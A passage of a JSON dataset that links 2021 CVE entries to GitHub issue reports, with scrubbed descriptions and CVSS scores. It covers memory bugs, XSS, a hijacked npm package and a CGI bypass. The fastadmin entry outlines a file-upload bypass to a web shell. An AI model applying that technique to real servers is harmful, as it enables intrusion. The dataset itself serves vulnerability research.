after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42218",
        "Issue_Url_old": "https://github.com/ompl/ompl/issues/839",
        "Issue_Url_new": "https://github.com/ompl/ompl/issues/839",
        "Repo_new": "ompl/ompl",
        "Issue_Created_At": "2021-10-07T07:30:39Z",
        "description": "A memory leak in VFRRT. When I\u2019m testing ompl, here is a memory leak occured. After positioning,we found that the error is caused by the following code in APITAG FILETAG In line NUMBERTAG A motion object was requested with it\u2019s constructor,and also new a state in that motion.but in line NUMBERTAG the state in motion was assigned. The space applied in the constructor becomes a wild APITAG why memory leaks. We suggest to use the default constructor in line APITAG that: FILETAG I did my experiment on Ubuntu NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-4229",
        "Issue_Url_old": "https://github.com/faisalman/ua-parser-js/issues/536",
        "Issue_Url_new": "https://github.com/faisalman/ua-parser-js/issues/536",
        "Repo_new": "faisalman/ua-parser-js",
        "Issue_Created_At": "2021-10-22T13:46:48Z",
        "description": "Security issue: compromised npm packages of ua parser js NUMBERTAG Questions about deprecated npm package ua parser js. Hi! See a warning at npm URLTAG APITAG First question Can we use range APITAG , or it is not safe? Second question Will you create a new package, or try to remove hijacked versions and continue update this package?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42342",
        "Issue_Url_old": "https://github.com/embedthis/goahead/issues/305",
        "Issue_Url_new": "https://github.com/embedthis/goahead/issues/305",
        "Repo_new": "embedthis/goahead",
        "Issue_Created_At": "2021-10-12T00:50:25Z",
        "description": "Upload form vars bypass CGI prefixing.. Summary A security vulnerability exists with the file upload filter where user form variables can be passed to CGI scripts without being prefixed with the CGI prefix. Detail The upload filter accepts uploaded files with optional user form variables. When used with the CGI handler, these form variables are passed as O/S process environment variables. Form variables in Post requests are prefixed using the ME_GOAHEAD_CGI_VAR_PREFIX which is typically set to CGI_. However, the upload filter is not setting the untrusted var bit and so the CGI handler does not use the prefix. Threat Scope and Mitigation For users who have the upload filter configured and the CGI handler configured, the vulnerability can be used to perform remote code execution. CVE Pending. Remedy Deploy APITAG NUMBERTAG Credit Thanks to William Bowling at URLTAG and confirmed and extended by Zup. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42584",
        "Issue_Url_old": "https://github.com/convos-chat/convos/issues/623",
        "Issue_Url_new": "https://github.com/convos-chat/convos/issues/623",
        "Repo_new": "convos-chat/convos",
        "Issue_Created_At": "2021-10-12T19:56:57Z",
        "description": "Vulnerability in URLTAG I have identified a stored cross site scripting vulnerability in URLTAG below is the POC for your reference: POC: APITAG by jberger) Reference Link: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-42648",
        "Issue_Url_old": "https://github.com/cdr/code-server/issues/4355",
        "Issue_Url_new": "https://github.com/coder/code-server/issues/4355",
        "Repo_new": "coder/code-server",
        "Issue_Created_At": "2021-10-14T08:16:39Z",
        "description": "Cross Site Scripting\uff08XSS\uff09vulnerability in code server. APITAG APITAG Information Web Browser: firefox Local OS: Debian Remote OS: Debian Remote Architecture: APITAG NUMBERTAG Steps to Reproduce APITAG your browser and insert payload APITAG NUMBERTAG example: APITAG APITAG APITAG Screenshot FILETAG APITAG Notes APITAG This issue can be reproduced in VS Code: Yes",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42859",
        "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/286",
        "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/286",
        "Repo_new": "michaelrsweet/mxml",
        "Issue_Created_At": "2021-10-15T03:56:39Z",
        "description": "stack buffer overflow and heap buffer overflow. Hi, We have used Mini xml in our project, so I test NUMBERTAG and master branch and found something: Fisrt, there are some memory leaks in NUMBERTAG and master: ERRORTAG and : this is your testmxml.c: ERRORTAG also ,we I input an unformed string to APITAG there will be a stack buffer overflow and heap buffer overflow. I think if you add a longth check in mxml_string_getc when every pointer change(\"like ( s)++\"), will be better? Of course Maybe I have use it in a wrong . you can check it here: this is my testcase: CODETAG you can compile your lib with CFLAGS =+ \" g O0 fno omit frame pointer gline tables only fsanitize=address fsanitize address use after scope fsanitize=fuzzer no link\" and LDFLAGS =+\" fsanitize=fuzzer no link fsanitize=address\" and clang++ g O1 fno omit frame pointer gline tables only fsanitize=address fsanitize address use after scope fsanitize=fuzzer no link mxml_fuzzer.cpp I ./ fsanitize=fuzzer ./libmxml.a run and these are the backtrace: ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42863",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4793",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4793",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-10-13T02:35:23Z",
        "description": "Buffer overflow in ecma builtin typedarray prototype.c. APITAG revision d NUMBERTAG e7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ICE: Assertion 'object_p >type_flags_refs >= ECMA_OBJECT_REF_ONE' failed at PATHTAG (ecma_deref_object NUMBERTAG Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) Backtrace NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG in __GI_abort () at APITAG NUMBERTAG in jerry_port_fatal APITAG at PATHTAG NUMBERTAG fccb4a in jerry_fatal APITAG at PATHTAG NUMBERTAG fccba0 in jerry_assert_fail (assertion NUMBERTAG db0 \"object_p >type_flags_refs >= ECMA_OBJECT_REF_ONE\", file NUMBERTAG d NUMBERTAG PATHTAG function NUMBERTAG a NUMBERTAG APITAG \"ecma_deref_object\", line NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG in ecma_deref_object (object_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG in ecma_free_value (value NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in ecma_fast_free_value (value NUMBERTAG at PATHTAG NUMBERTAG fea NUMBERTAG in opfunc_call (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ff5e4b in vm_execute (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ff NUMBERTAG ea in vm_run (shared_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG a0, this_binding_value NUMBERTAG lex_env_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG fb NUMBERTAG in ecma_op_function_call_simple (func_obj_p NUMBERTAG b NUMBERTAG APITAG , this_arg_value NUMBERTAG APITAG arguments_list_len NUMBERTAG at PATHTAG NUMBERTAG fb1a NUMBERTAG in ecma_op_function_call (func_obj_p NUMBERTAG b NUMBERTAG APITAG , this_arg_value NUMBERTAG APITAG arguments_list_len NUMBERTAG at PATHTAG NUMBERTAG fea4a9 in opfunc_call (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG d0) at PATHTAG NUMBERTAG ff5e4b in vm_execute (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG d0) at PATHTAG NUMBERTAG ff NUMBERTAG ea in vm_run (shared_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG e0, this_binding_value NUMBERTAG lex_env_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG fe NUMBERTAG c1 in vm_run_global (bytecode_p NUMBERTAG b6a8 APITAG , APITAG APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG in jerry_run (func_val NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG ffcb NUMBERTAG d NUMBERTAG c8) at PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG b3 in __libc_start_main (main NUMBERTAG f NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG ffcb NUMBERTAG d NUMBERTAG c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffcb NUMBERTAG d NUMBERTAG b8) at PATHTAG NUMBERTAG f NUMBERTAG ce in _start () Expected behavior APITAG in ecma builtin typearray APITAG should check type of the array give backed by filter. We have already made this crash an arbitrary read/write, if you need that APITAG please contact us.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42917",
        "Issue_Url_old": "https://github.com/xbmc/xbmc/issues/20305",
        "Issue_Url_new": "https://github.com/xbmc/xbmc/issues/20305",
        "Repo_new": "xbmc/xbmc",
        "Issue_Created_At": "2021-10-12T06:07:43Z",
        "description": "Kodi NUMBERTAG Buffer Overflow. Bug report Describe the bug The attached ASX FILE causes a crash in Kodi NUMBERTAG on Windows NUMBERTAG To reproduce the issue, the attached file poc.asx can be used. it should crash with an access violation like the following: Thread NUMBERTAG E4 exit Thread E NUMBERTAG exit Thread E NUMBERTAG exit Breakpoint at NUMBERTAG FFB6E NUMBERTAG set! INT3 breakpoint at APITAG NUMBERTAG FFB6E NUMBERTAG E0BFF4F7E NUMBERTAG E0BFF4F7E NUMBERTAG FFB NUMBERTAG C NUMBERTAG return to APITAG from NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F NUMBERTAG Expected Behavior Should display file type not supported or unable to open file Actual Behavior To Reproduce Steps to reproduce the behavior: firstly, close running kodi application head =''' APITAG APITAG APITAG APITAG APITAG ''' APITAG fobj = APITAG APITAG APITAG poc.asx is generated now open with kodi . it will take hrs to open kodi .on some cases it crash FILETAG Debug NUMBERTAG E0BFF4D5C NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5D NUMBERTAG E0BFF4DB NUMBERTAG E0BFF4D5D NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5E NUMBERTAG E0BFF4DA NUMBERTAG ERRORTAG null NUMBERTAG or unexpected EOF found in input stream NUMBERTAG E0BFF4D5E NUMBERTAG FF NUMBERTAG DAD4D return to APITAG from APITAG NUMBERTAG E0BFF4D5F NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5F NUMBERTAG FFB6E NUMBERTAG C NUMBERTAG APITAG NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D NUMBERTAG E NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG CBDAC NUMBERTAG E0BFF4D NUMBERTAG FF NUMBERTAG D NUMBERTAG APITAG NUMBERTAG E0BFF4D NUMBERTAG CBDAC NUMBERTAG A0 &\"pt NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG CBDD NUMBERTAG F NUMBERTAG APITAG APITAG <REF HREF= PATHTAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF7D NUMBERTAG A NUMBERTAG E0BFF4DC NUMBERTAG BDA NUMBERTAG E0BFF4DC NUMBERTAG FF NUMBERTAG B NUMBERTAG B0 APITAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG FFB NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DBA NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF NUMBERTAG PATHTAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DCA NUMBERTAG E0BFF4DCA NUMBERTAG F NUMBERTAG E0BFF4DCB NUMBERTAG F3AC NUMBERTAG E0BFF4DCB NUMBERTAG FFB NUMBERTAG C NUMBERTAG CD return to APITAG from APITAG NUMBERTAG E0BFF4DCC NUMBERTAG CB4C NUMBERTAG AD NUMBERTAG F NUMBERTAG E0BFF4DCC NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DCD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DCD NUMBERTAG FF NUMBERTAG CF1D NUMBERTAG return to APITAG from NUMBERTAG E0BFF4DCE NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DCE NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DCF NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DCF NUMBERTAG FFB6E NUMBERTAG F NUMBERTAG B return to APITAG from NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DD NUMBERTAG FF NUMBERTAG A NUMBERTAG D5 return to APITAG from APITAG NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB6C NUMBERTAG A NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AD NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DD NUMBERTAG C NUMBERTAG E0BFF4DD NUMBERTAG FF NUMBERTAG E NUMBERTAG B return to APITAG from APITAG NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DD NUMBERTAG CBDA NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB4AB NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DDA NUMBERTAG F NUMBERTAG E0BFF4DDA NUMBERTAG F NUMBERTAG C NUMBERTAG E0BFF4DDB NUMBERTAG E0BFF4DDB NUMBERTAG E0BFF4DDC NUMBERTAG E0BFF4EB NUMBERTAG E0BFF4DDC NUMBERTAG E0BFF4DDD NUMBERTAG CB6CA4D NUMBERTAG F NUMBERTAG E0BFF4DDD NUMBERTAG CB6C NUMBERTAG A NUMBERTAG F NUMBERTAG E0BFF4DDE NUMBERTAG E0BFF4DEF NUMBERTAG E0BFF4DDE NUMBERTAG FF NUMBERTAG C NUMBERTAG FEF return to APITAG from APITAG NUMBERTAG E0BFF4DDF NUMBERTAG CB4AB NUMBERTAG E0BFF4DDF NUMBERTAG CBF NUMBERTAG C NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DE NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG CBF NUMBERTAG E NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DE NUMBERTAG FFB NUMBERTAG C NUMBERTAG D1 return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CBF NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG FFB NUMBERTAG C NUMBERTAG DC return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4E0F NUMBERTAG E0BFF4DEA NUMBERTAG E0BFF4DEA NUMBERTAG E0BFF4DEB NUMBERTAG E0BFF4DEB NUMBERTAG FFB NUMBERTAG C NUMBERTAG DC return to APITAG from APITAG NUMBERTAG E0BFF4DEC NUMBERTAG CBF3CAC NUMBERTAG nd descriptors. Usage: class APITAG APITAG def my_abstract_method(self, ...): ... NUMBERTAG E0BFF4DEC NUMBERTAG E0BFF4DED NUMBERTAG F6EC NUMBERTAG E0BFF4DED NUMBERTAG E0BFF4DEE NUMBERTAG E0BFF4DEE NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DEF NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DEF NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFF NUMBERTAG E0BFF4DF NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG CB NUMBERTAG AD return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG DB NUMBERTAG APITAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG CBF NUMBERTAG DA NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG FFB NUMBERTAG C NUMBERTAG E0BFF4DF NUMBERTAG CBF NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG CBF0D4AC NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DFA NUMBERTAG CBF NUMBERTAG A NUMBERTAG E0BFF4DFA8 FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DFB NUMBERTAG FCFC NUMBERTAG E0BFF4DFB NUMBERTAG C NUMBERTAG A NUMBERTAG E0BFF4DFC NUMBERTAG E0BFF4DFC NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DFD NUMBERTAG B NUMBERTAG E0BFF4DFD NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DFE NUMBERTAG CB NUMBERTAG A NUMBERTAG E0BFF4DFE NUMBERTAG CBD0A NUMBERTAG PATHTAG NUMBERTAG E0BFF4DFF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4DFF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG FFB NUMBERTAG C NUMBERTAG D0 return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG CBD0D NUMBERTAG D NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F7BC NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG C1C0 \"\u00f0\u201cQ NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F7EC NUMBERTAG E0BFF4E NUMBERTAG CB NUMBERTAG C NUMBERTAG D NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG CB4C NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4E NUMBERTAG CBDFB4C NUMBERTAG APITAG %s %s terminating (autodelete NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FC NUMBERTAG D5 return to APITAG from APITAG NUMBERTAG E0BFF4E0A NUMBERTAG E0BFF4E0A NUMBERTAG F NUMBERTAG E0BFF4E0B NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4E0B NUMBERTAG FFB6E NUMBERTAG F NUMBERTAG B return to APITAG from NUMBERTAG E0BFF4E0C NUMBERTAG CBD0AA NUMBERTAG E0BFF4E0C NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E0D NUMBERTAG C8EC NUMBERTAG E0BFF4E0D NUMBERTAG CB NUMBERTAG A NUMBERTAG E0BFF4E0E NUMBERTAG C8FC NUMBERTAG E0BFF4E0E NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4E0F NUMBERTAG C NUMBERTAG C NUMBERTAG E0BFF4E0F NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG CBDFB4A NUMBERTAG PATHTAG NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG C1C0 \"\u00f0\u201cQ NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG AD return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG C NUMBERTAG E1 return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG F0 APITAG NUMBERTAG E0BFF4E NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG CBF0D4CC0 \" return list(iterable) Let the base class default method raise the ERRORTAG return APITAG o NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG C NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG CBF0D4CC0 \" return list(iterable) Let the base class default method raise the ERRORTAG return APITAG o NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG A8F NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4F7E NUMBERTAG E0BFF4F7E NUMBERTAG FFB NUMBERTAG C NUMBERTAG return to APITAG from NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E8FFFFFB NUMBERTAG E0BFF4F NUMBERTAG D0FFFFFB NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F8A NUMBERTAG E0BFF4F8A NUMBERTAG E0BFF4F8B NUMBERTAG E0BFF4F8B NUMBERTAG E0BFF4F8C NUMBERTAG E0BFF4F8C NUMBERTAG E0BFF4F8D NUMBERTAG E0BFF4F8D NUMBERTAG E0BFF4F8E NUMBERTAG E0BFF4F8E NUMBERTAG E0BFF4F8F NUMBERTAG E0BFF4F8F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG Your Environment Used Operating system: [ ] Windows NUMBERTAG Operating system version/name: Kodi version NUMBERTAG note: Once the issue is made we require you to update it with new information or Kodi versions should that be required. Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43086",
        "Issue_Url_old": "https://github.com/ARM-software/astc-encoder/issues/296",
        "Issue_Url_new": "https://github.com/arm-software/astc-encoder/issues/296",
        "Repo_new": "arm-software/astc-encoder",
        "Issue_Created_At": "2021-10-22T05:18:39Z",
        "description": "stack buffer overflow in function APITAG Version APITAG Environment Ubuntu NUMBERTAG bit Command Compile test program: APITAG Compile test program with address sanitizer: Update Makefile: CODETAG Compile program: APITAG Result The result of running without ASAN: CODETAG Information obtained by using ASAN: ERRORTAG Description ERRORTAG Poc Poc file is this URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43117",
        "Issue_Url_old": "https://github.com/ambitiousleader/some-automated-script/issues/1",
        "Issue_Url_new": "https://github.com/ambitiousleader/some-automated-script/issues/1",
        "Repo_new": "ambitiousleader/some-automated-script",
        "Issue_Created_At": "2021-10-27T08:08:15Z",
        "description": "fastadmin NUMBERTAG file upload getshell. Detail: FILETAG ERRORTAG PATHTAG Line NUMBERTAG FILETAG Four method ,analyse one by one PATHTAG APITAG Line NUMBERTAG check upload file size is not bigger than default FILETAG PATHTAG APITAG Line NUMBERTAG PHP file and HTML file is not allowed to upload FILETAG PATHTAG APITAG Line NUMBERTAG check file APITAG is default APITAG =$this >config FILETAG PATHTAG APITAG Line NUMBERTAG check upload file is a picture,because judgment is logical or,as long as type value in_array return true,we can upload other PHP suffix file that can be parsed\uff0csuch as php5,phtml,php3 and so on FILETAG change the content type to gif,filename to xx.phtml FILETAG however,phtml can't be parsed,I find that if the CMS is build with Debian or Ubuntu environment,attack can be APITAG or Ubuntu apache2 configuration file write as follow,it will contains mods enabled/ .conf file automatically\uff0cwhich default parse phtml as php FILETAG FILETAG so,access the shell address to complete the attack,this ip is my debian's ip address FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43398",
        "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/1080",
        "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/1080",
        "Repo_new": "weidai11/cryptopp",
        "Issue_Created_At": "2021-10-28T08:39:07Z",
